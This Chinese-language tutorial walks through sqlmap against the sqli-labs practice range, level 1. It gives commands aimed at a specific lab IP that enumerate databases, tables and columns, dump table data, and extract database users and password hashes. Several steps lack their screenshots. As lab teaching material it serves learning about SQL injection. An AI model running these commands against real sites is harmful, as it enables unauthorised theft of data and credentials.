文章摘要
这篇文章介绍了如何利用SQLMAP工具来检测SQL注入点,并展示了其在数据库分析中的应用。文章通过示例,详细讲解了使用SQLMAP进行以下操作: 1. **判断注入点**:使用`sqlmap -u ... --dbs`获取所有数据库,进而判断是否存在注入点。2. **查询数据库**:使用`sqlmap -u ... -D <数据库名>`获取特定数据库的信息。3. **获取表名**:使用`sqlmap -u ... -D <数据库名> --tables`列出所有表名。4. **获取字段名**:通过`sqlmap -u ... -D <数据库名> -T <表名> --columns`和`--columns -dump`获取表中的字段名和详细信息。5. **获取用户信息**:使用`sqlmap -u ... --current-db`显示当前数据库,`sqlmap -u ... --current-user`获取当前用户。 文章通过这些步骤,展示了如何利用SQLMAP工具进行SQL注入检测和分析,帮助读者掌握SQL注入的实用技术。
目录一、判断是否存在注入点二、查询当前用户下所有数据库三、获取数据库中的表名四、获取表中的字段名五、获取字段内容六、获取数据库的所有用户七、获取数据库用户的密码八、获取当前网站数据库的名称九、获取当前网站数据库的用户名称
原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
使用命令:
使用命令:
有图中白色背景的 则判断出有注入点

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –dbs
可以看到有五个表

选取一个challenges数据库,获取此库的表名
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges –tables

选取表T5M0QG6FM2,获取其中字段名
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 –columns

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 –columns –dump

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –users
使用该命令就可以列出所有管理用户

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –passwords

使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –current-db

可以看到当前的数据库是 security
使用命令:
sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –current-user
当前用户是root

到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了,更多相关sqlmap入门内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
您可能感兴趣的文章:sqlmap之os?shell图文详细解析教你编写SQLMap的Tamper脚本过狗SQLMAP插件tamper模块简介SQLMAP插件tamper编写与使用详解sqlmap注入图文详解
© 版权声明
文章版权归作者所有,未经允许请勿转载。



